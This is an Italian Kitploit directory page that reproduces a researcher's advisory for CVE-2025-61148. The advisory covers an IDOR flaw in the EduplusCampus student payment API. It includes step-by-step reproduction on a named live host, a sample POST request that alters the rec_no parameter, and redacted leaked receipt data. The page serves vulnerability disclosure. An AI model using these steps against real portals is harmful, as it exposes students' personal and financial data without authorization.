Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-61148 — La vulnerabilità esiste nell'API di Pagamento Studenti. L'applicazione non convalida correttamente se l'utente che richiede una ricevuta è autorizzato a visualizzarla. Modificando il parametro rec_no nella richiesta API, un attaccante può accedere alle ricevute di altri utenti. | Kitploit
Strumenti/GitHubGitHub/sharma19d/cve-2025-61148
Analisi delle VulnerabilitàSfruttamento di Applicazioni WebTest di Sicurezza delle APIRaccolta InformazioniPenetration TestingApprendimento e Formazione
GitHubsharma19d/cve-2025-61148

CVE-2025-61148

La vulnerabilità esiste nell'API di Pagamento Studenti. L'applicazione non convalida correttamente se l'utente che richiede una ricevuta è autorizzato a visualizzarla. Modificando il parametro rec_no nella richiesta API, un attaccante può accedere alle ricevute di altri utenti.

Vedi Repository
49 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-61148

La vulnerabilità esiste nell'API di Pagamento Studenti. L'applicazione non riesce a convalidare correttamente se l'utente che richiede una ricevuta è autorizzato a visualizzarla. Modificando il parametro rec_no nella richiesta API, un attaccante può accedere alle ricevute di altri utenti.

CVE-2025-61148: IDOR nell'API di Pagamento Studenti di EduplusCampus

ID CVE: CVE-2025-61148 Tipo di vulnerabilità: Insecure Direct Object Reference (IDOR) Prodotto interessato: EduplusCampus Endpoint interessato: /student/get-receipt Ricercatore: Vinay Sharma

Riepilogo

È stata identificata una vulnerabilità critica di Insecure Direct Object Reference (IDOR) nel portale studenti EduplusCampus (versione 3.0.1). Questa vulnerabilità consente a un utente autenticato di accedere ai dati personali e finanziari sensibili di altri studenti modificando il parametro rec_no nella richiesta API.

Impatto

Un exploit riuscito consente a un attaccante di recuperare:

  • Nome completo e numero di matricola
  • Importo del pagamento e date
  • ID di transazione (TID) e dettagli bancari
  • Informazioni personali identificabili (PII)

Dettagli della vulnerabilità

L'applicazione non convalida correttamente l'autorizzazione dell'utente che richiede una ricevuta di pagamento. Il parametro rec_no è sequenziale o prevedibile, e il server restituisce i dettagli della ricevuta per il numero richiesto senza verificare se appartiene all'utente attualmente connesso.

Passaggi per riprodurre

  1. Accedi al portale studenti.
  2. Vai alla sezione di generazione delle ricevute.
  3. Intercetta la richiesta POST a /student/get-receipt.
  4. Individua il parametro rec_no nel corpo JSON.
  5. Modifica il valore di rec_no con un altro numero di ricevuta valido (ad esempio, cambiando PCUF-232025 in PCUF-231824).
  6. Invia la richiesta.
  7. Il server risponde con i dettagli personali e finanziari dello studente associato a quel numero di ricevuta.
image
image

Esempio di richiesta

root@kitploit:~
POST /student/get-receipt HTTP/1.1
Host: student.edupluscampus.com
Content-Type: application/json
Authorization: Bearer <token>

{
    "rec_no": "PCUF-233012"
}

### Esempio di dati trapelati:
{
    "fullname": "REDACTED_NAME",
    "rollno": "CSE2019XXX",
    "component_total_amount": 55000.0,
    "trans_list": [
        {
            "date": "21-Oct-2024",
            "mode": "Online",
            "amount": 55000.0,
            "tid": "42951XXXX"
        }
    ]
}

Informazioni sul fornitore

  • Fornitore: EduplusCampus
  • Prodotto: Portale Studenti EduplusCampus / API di Pagamento Studenti

Versioni interessate

  • Versione: EduplusCampus 3.0.1

Scopritore

  • Vinay Sharma - Ricercatore di Sicurezza
Scarica lo strumento